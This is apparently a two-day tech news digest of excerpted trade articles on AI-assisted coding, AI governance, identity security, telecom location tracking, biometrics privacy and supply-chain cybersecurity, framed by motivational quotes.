"Great achievement is usually born of great sacrifice, and is never the result of selfishness." -- Napoleon Hill

Daily Tech Digest - April 04, 2024

Transforming CI/CD Pipelines for AI-Assisted Coding: Strategies and Best Practices

Most source code management tools, including Git, support tagging features that let developers apply labels to specific snippets of code. Teams that adopt AI-assisted coding should use these labels to identify code that was generated wholly or partially by AI. This is an important part of a CI/CD strategy because AI-generated code is, on the whole, less reliable than code written by a skilled human developer. For that reason, it may sometimes be necessary to run extra tests on AI-generated code — or even remove it from a codebase in the event that it triggers unexpected bugs. ... Along similar lines, some teams may find it valuable to deploy extra tests for AI-generated code during the testing phase of their CI/CD pipelines, both to ensure software quality and to catch any vulnerable code or dependencies that AI introduces into a codebase. Running those tests is likely to result in a more complex testing process because there will be two sets of tests to manage: those that apply only to AI-generated code, and those that apply to all code. Thus, the testing stage of CI/CD is likely to become more complicated for teams that use AI tools.


Revolutionising Regulatory Compliance: AI & ML Powering The Future Of Financial Governance

The use of technology is quickly transforming how businesses handle compliance challenges. AI helps by automating tasks like monitoring and reporting. It quickly finds new regulatory requirements in a sea of information and ensures adherence by the organisation. Machine learning, a type of AI, is good at spotting patterns and unusual things, which is important for following rules. By looking at historical data, it can predict possible risks, so companies can deal with them early. Compliance officers can use AI tools to do routine tasks, handle hard problems, and be more open with regulators. AI’s smart systems make compliance work smoother and more accurate. Looking forward, AI’s contribution to compliance seems promising. Predictive compliance management, powered by AI, will move from reacting to problems to spotting risks early, which could save companies from legal trouble. Real-time monitoring and personalised solutions for each company will become common, making compliance easier and better. Also, AI will work with other new technologies like blockchain and IoT to improve compliance.


Codium announces Codiumate, a new AI agent that seeks to be Devin for enterprise software development

Codium hopes that Codiumate will aid developers in their workflow, speeding up all the manual typing they would otherwise have to do, doing the “heavy lifting” and mechanical coding work, while enabling the developer to act more as a hands-on product manager overseeing the process and course correcting it as necessary, almost as though it is a junior developer or new hire to the team. The technology powering the Codiumate agent on the backend is “best of breed” OpenAI models, according to Friedman. The company is also experimenting with Anthropic’s Claude and Google’s Gemini. It also offers its own large language model (LLM) designed with its AlphaCodium process that increases the performance of other LLMs in code completion tasks. While the former is available to all users, the latter Codium LLM is only for paying enterprise users. Friedman said it is superior to OpenAI’s models on coding and that a “Fortune 10” company that could not be named due to confidentiality reasons was already using it in production.


Healthcare’s cyber resilience under siege as attacks multiply

Every healthcare organization must ensure employees are well aware of and trained about potential threats. It’s critical to ensure they understand how to navigate and evaluate everything that comes in. One requirement could be to only open emails from known senders or to only open attachments if they are secure. Many organizations’ security teams will conduct resilience tests and distribute suspicious-looking emails to see which employees will click it. Modern spam filters are relatively adept at weeding out risky emails, but anyone with an inbox knows that many get through to end users. Most employers issue computers and devices, allowing for secured settings maintained by IT departments. It’s important to keep access and logins only to those devices and not on any personal devices, which are typically much easier attack points to enter a system. Maintaining robust security settings on issued machines is especially important if the employee will be working from remote locations, including at home, where network security tends to not be as robust as within enterprises.


Instilling the Hacker Mindset Organizationwide

Visibility is a foundational principle that suggests you can't secure what you don't know about. Lack of a security team's visibility is a gold rush for hackers because they typically infiltrate an organization's network via hidden or sneaky entry points. If you don't have visibility, there will undoubtedly be a way in. Without visibility into all traffic within an organization's infrastructure, threat actors can continue to lurk in the network and grant themselves access to the organization's most sensitive data. With 93% of malware hiding behind encrypted traffic but only 30% of security professionals claiming to have visibility, it's no wonder that there were more ransomware attacks in the first half of 2023 than in all of 2022. Once a cybercriminal has made their way into the network, time is limited. Only with visibility can the cybercriminal be stopped from wreaking havoc and gaining access to company data. When cybersecurity professionals can better understand the mysterious nature of hackers and how they work, they can better protect their own systems and valuable customer data. It's critical to stay vigilant not only when it comes to major security issues, but also with minor lags in security best practice.


Separating the signals from the noise in tech evolution

With technology trends extensively covered across all forms of media, IT leaders often get questions or advice from well-meaning senior colleagues on what trends to adopt. However, not every trend warrants immediate attention or even playing catch-up if you’re late to the party. Wise leaders often opt to be “smart laggards” who focus on adopting and scaling the trends that really matter to their organizations. And they focus on demonstrating value quickly or stopping pilots or initiatives that are not delivering. ... In the current environment of uncertainty, marked by persistent macroeconomic challenges, global fragmentation, and growing cybersecurity challenges, tech leaders shared their perspectives on risks and resilience. More than one described reinventing the technology function and its value proposition in times of crisis, taking a “through-cycle mindset”: pushing forward in times of crisis rather than retrenching, and focusing on long-term value creation to help the company emerge stronger when conditions change. We also discussed how dashboards should balance short- to mid-term KPIs with long-term value delivery.


Navigating risks in AI governance – what have we learned so far?

In the face of a regulatory void, several entities have taken it upon themselves to establish their own standards aimed at tackling the core issues of model transparency, explainability, and fairness. Despite these efforts, the call for a more structured approach to govern AI development, mindful of the burgeoning regulatory landscape, remains loud and clear. ... However, an AI Risk and Security (AIRS) group survey reveals a notable gap between the need for governance and its actual implementation. Only 30% of enterprises have delineated roles or responsibilities for AI systems, and a scant 20% boast a centrally managed department dedicated to AI governance. This discrepancy underscores the burgeoning necessity for comprehensive governance tools to assure a future of trustworthy AI. ... The patchwork of regulatory approaches across the globe reflects the diverse challenges and opportunities presented by AI-driven decisions. The United States, for example, saw a significant development in July 2023 when the Biden administration announced that major tech firms would self-regulate their AI development, underscoring a collaborative approach to governance.


Unlocking Personal and Professional Growth: Insights From Incident Management

The skills and lessons gained from Incident Management are highly transferable to various aspects of life. For instance, adaptability is crucial not only in responding to technical issues but also in adapting to changes in personal circumstances or professional environments. Teamwork teaches collaboration, conflict resolution, and empathy, which are essential in building strong relationships both at work and in personal life. Problem-solving skills honed during incident response can be applied to tackle challenges in any domain, from planning a project to resolving conflicts. Resilience, the ability to bounce back from setbacks, is a valuable trait that helps individuals navigate through adversity with determination and a positive mindset. Continuous improvement is a mindset that encourages individuals to seek feedback, reflect on experiences, identify areas for growth, and strive for excellence. This attitude of continuous learning and development not only benefits individuals in their careers but also contributes to personal fulfillment and satisfaction.


How to build a developer-first company

Providing a great developer experience—by enabling our customers to easily add auth flows and user management to their apps—leads to a great end-user experience as the customer’s customers seamlessly and securely log in.This kind of virtuous cycle exists at many developer-focused companies. When building a successful developer-first business, it’s critical to tie together the similarities between the customer experience and the developer experience while clearly delineating the differences. ... When helping developers build their customer experience, we emphasize building onboarding and authentication flows with the best user experience in mind. That includes reducing friction, like the use of passwordless methods and progressive profiling, and creating an embedded in-app native experience to avoid needless redirections or pop-ups. Our developer experience includes an onboarding wizard that sets up their project and login flows in a few clicks. We offer a drag-and-drop visual workflow editor to easily create and customize their customer journey. We also provide robust documentation, code snippets, SDKs, tutorials, and a Slack community for troubleshooting. 


How to fix the growing cybersecurity skills gap

Organizations looking to upskill their cybersecurity professionals should consider adjusting and reorganizing key workflows to give the entire security team — aside from just the CISO — ample time to research emerging threats and remain up to date on what the ramifications of these threats may be. By automating repetitive tasks for these team members or restructuring key processes and timelines, the entire team, from CISO to analyst, can have more time to dedicate towards staying ahead of industry trends and cyber-attacks, ultimately strengthening the organization’s ability to detect and respond to threats in the long run. Giving employees time and space to be curious and explore the latest threat intelligence, commentary and insight — including topic-based tabletop exercises or red teaming — will yield significant dividends in understanding the organization's true security posture and preparedness. In today’s cybersecurity landscape, companies must strive to be a learning-forward organization. Tangible adoption of this principle must go beyond formal skills and training — every encounter your teams have with a threat or an attack is a learning opportunity.



Quote for the day:

"Though no one can go back and make a brand new start, anyone can start from now and make a brand new ending." -- Carl Band

Daily Tech Digest - April 03, 2024

What is identity fabric immunity? Abstracting identity for better security

An identity fabric becomes an attractive option when it is merited, but the adoption of it before it is really called for adds unnecessary complexity. The key is knowing the tipping point. If it is doing the job with minimal friction, a simple identity provider framework is sufficient. When the infrastructural complexity begins to cause serious difficulty within the organization, the security abstraction layer described by IFI offers a way forward, says Dmitry Sotnikov, chief product officer at Cayosoft. “Applications are now highly distributed, and users, partners, and customers log into systems from wherever they are, leaving security teams without an easily defined network and physical boundary to protect.” Signs that identity solutions are inadequate include difficulty in managing user access, account provisioning, and response to security incidents both real and simulated. Managers may find that it is very hard to gain an overhead perspective on the security disposition of an enterprise and taking actions that affect security as a whole is cumbersome or extremely challenging.


Cyber attacks on critical infrastructure show advanced tactics and new capabilities

The interconnectedness of critical infrastructure assets, devices, and systems with third parties throughout the software supply chain has made identifying attack paths more complex than ever before. This interconnectedness creates numerous potential entry points for attackers to exploit. Additionally, cyber adversaries now possess a range of new tactics. ... Recent attacks on entities like Colonial Pipeline and water treatment plants demonstrate the potential for malicious actors to cause real-world impacts with just a few clicks. Ransomware criminals are increasingly targeting industries that rely heavily on operational systems, knowing that downtime can result in significant financial losses. Ransomware-as-a-Service (RaaS) has further fueled the proliferation of ransomware attacks, making these attacks more accessible to a wider range of threat actors. It’s important to note that criminal ransomware operators don’t typically use the zero-days that make headlines, or cyberwarfare-level capabilities; they exploit known vulnerabilities that have been unpatched for years.


Feds Ask Telcos: How Are You Combating Location Tracking?

The problems stem from the trust-based approach underpinning SS7, which is used to secure 3G and earlier networks, and Diameter, which is used to secure 4G. As detailed in a white paper from Swedish telecommunications giant Ericsson, both protocols take a trust-based approach, assuming that any network elements communicating with each other should be doing so. Even though Diameter is a newer protocol, it lacks security capabilities. "Diameter does not encrypt originating IP addresses during transport, which increases the risk of network spoofing, where an attacker poses as a legitimate roaming partner on a network to gain access to the network," the FCC said. Since SS7 and Diameter still serve as "the foundation for mobile telephone networks, especially for roaming capabilities to be able to interconnect networks," as networks expand their coverage and new networks and more users appear, "the opportunity for a bad actor to exploit SS7 and Diameter has increased," the FCC said. While the use of protocols such as SS7 and Diameter can be restricted to secure tunnels, thus making them more secure, the use of secure tunneling isn't mandatory, Ericsson said.


Avoiding the dangers of AI-generated code

As the adoption of AI tools to create code increases, organizations will have to put in place the proper checks and balances to ensure the code they write is clean—maintainable, reliable, high-quality, and secure. Leaders will need to make clean code a priority if they want to succeed. Clean code—code that is consistent, intentional, adaptable, and responsible—ensures top-quality software throughout its life cycle. With so many developers working on code concurrently, it’s imperative that software written by one developer can be easily understood and modified by another at any point in time. With clean code, developers can be more productive without spending as much time figuring out context or correcting code from another team member. When it comes to mass production of code assisted by AI, maintaining clean code is essential to minimizing risks and technical debt. Implementing a “clean as you code” approach with proper testing and analysis is crucial to ensuring code quality, whether the code is human-generated or AI-generated. Speaking of humans, I don’t believe developers will go away, but the manner in which they do their work every day will certainly change. 


Biggest problems and best practices for generative AI rollouts

The first step in the genAI journey is to determine the AI ambition for the organization and conduct an exploratory dialogue on what is possible, according to Gartner. The next step is to solicit potential use cases that can be piloted with genAI technologies. Unless genAI benefits translate into immediate headcount reduction and other cost reduction, organizations can expect financial benefits to accrue more slowly over time depending on how the generated value is used. For example, Chandrasekaran said, an organization being able to do more with less as demand increases, to use fewer senior workers, to lower use of service providers, and to improve customer and employee value, which leads to higher retention, are all financial benefits that grow over time. Most enterprises are also customizing pre-built LLMs, as opposed to building out their own models. Through the use of prompt engineering and retrieval-augmented generation (RAG), firms can fine-tune an open-source model for their specific needs. RAG creates a more customized and accurate genAI model that can greatly reduce anomalies such as hallucinations.


Digital Transformation: What Should be Next on Your Agenda?

Paying close attention to disruptive emerging technologies will help to future-proof strategies, Buchholz says. "Have you accounted for the impact of quantum computing?" he asks. "Within several years, it's likely to go from lab curiosity to useful tool." How about digital twins or the spatial web? "Not all of these [technologies] will come to pass but investing a few days up front can save years of pain down the road." Focus on digital transformation initiatives that have the highest potential to create value for the organization and its stakeholders, Bakalar advises. "Avoid wasting time, money, and effort on projects with low strategic value, feasibility or urgency." The best way to prioritize a digital transformation strategy is by defining precisely what transformation means to your organization, says Jed Cawthorne, modern work practice lead with IT consulting firm Creospark, via email. "Develop the strategy appropriately and, from there, prioritize the projects that will form your transformation plan." If one takes the approach of focusing on smaller, easier to digest transformation projects, you can reassess your prioritization at the completion of each project, Cawthorne says.


User privacy must come first with biometrics

Use cases have expanded to airports with biometric boarding, mobile banking and e-commerce to facilitate and authenticate transactions, and even with various branches of law enforcement using it for surveillance purposes. The benefits of AI-powered facial recognition technology are off the charts, with potential for dramatic increases in efficiency, security and ease of use across industries. But with upside comes an equally compelling downside, as organizations need to consider the privacy risks and concerns associated with collecting and using biometric data at scale. ... As biometrics continues to go mainstream, data discovery, data classification and the handling of sensitive information will become mainstay on IT task lists. But the key to not overwhelming IT is to incorporate data privacy principles and tactics at the start of development, so problems can be tackled proactively rather than reactively. This will be tech’s main challenge in the coming years. With AI fever everywhere, users will soon expect to access facial recognition services and products in a more personalized, efficient way, without compromising on the privacy front.


Be the change: Leveraging AI to fast track next-gen cyber defenders

With AI, enterprises can detect and prevent threats with speed and efficiency and secure a broader range of assets better than humans alone. They’re no longer limited by how many people are in their Security Operations Center or the expertise of their team. Instead, they are empowered to see things in real time and defend their environment against attacks in an infinitely scalable way. But AI can’t act alone and automation can only go so far. Humans will always be needed in the loop to decide what to do with the data and insights it provides. AI can be used to support these people and supercharge their capabilities. Consider the following: The job of a threat hunter is to translate these concepts into queries. But this requires knowledge of complex languages and coding skills that are in short supply. AI-based platforms allow security teams to ask complex threat and adversary-hunting questions using natural language, and within seconds provide insights and recommended response actions that can be immediately executed. Entry-level threat hunters once limited in what they could solve can move to the next level and veterans can become more efficient, effective, and strategic.


Why A Bad LLM Is Worse Than No LLM At All

For an LLM to return a useful output, it needs to have interpreted the user’s query or prompt the way it was intended. There is a lot of nuance in language that can lead to misunderstandings and no solution exists yet that has guardrails to ensure consistent—and accurate—results that meet expectations. ... LLMs, including ChatGPT, have been known to simply make up data to fill in the gaps in their knowledge just so that they can answer the prompt. They are designed to produce answers that feel right, even if they aren’t. If you work with vendors supplying LLMs within their products or as standalone tools, it’s critical to ask them how their LLM is trained and what they’re doing to mitigate inaccurate results. ... The majority of LLMs on the market are available publicly online, which makes it incredibly challenging to safeguard any sensitive information or queries you input. It’s very likely that this data is visible to the vendor, who will almost certainly be storing and using it to train future versions of their product. And if that vendor is hacked or there’s a data leak, expect even bigger headaches for your organization. 


Building Resilient Cybersecurity Into Supply Chain Operations: A Technical Approach

One of the key challenges in supply chain cybersecurity is the interdependent nature of the supply chain. A single weak link in the chain can compromise the entire operation. For example, a cyberattack on a supplier could disrupt production, leading to delays, financial loss, and damage to the company's reputation. Moreover, the growing trend of digital transformation has led to an increase in the use of technologies such as Internet of Things (IoT) devices, cloud computing, and artificial intelligence in supply chain operations. While these technologies offer numerous benefits, they also increase the surface area for potential cyberattacks. ... The digital transformation of supply chains has led to the integration of various technologies such as IoT devices, cloud platforms, and AI-based systems. While these technologies have enhanced efficiency and productivity, they have also increased the complexity of the cybersecurity landscape. Ensuring the security of these diverse technologies, each with its own set of vulnerabilities, is a significant technical challenge.



Quote for the day:

"The distance between insanity and genius is measured only by success." -- Bruce Feirstein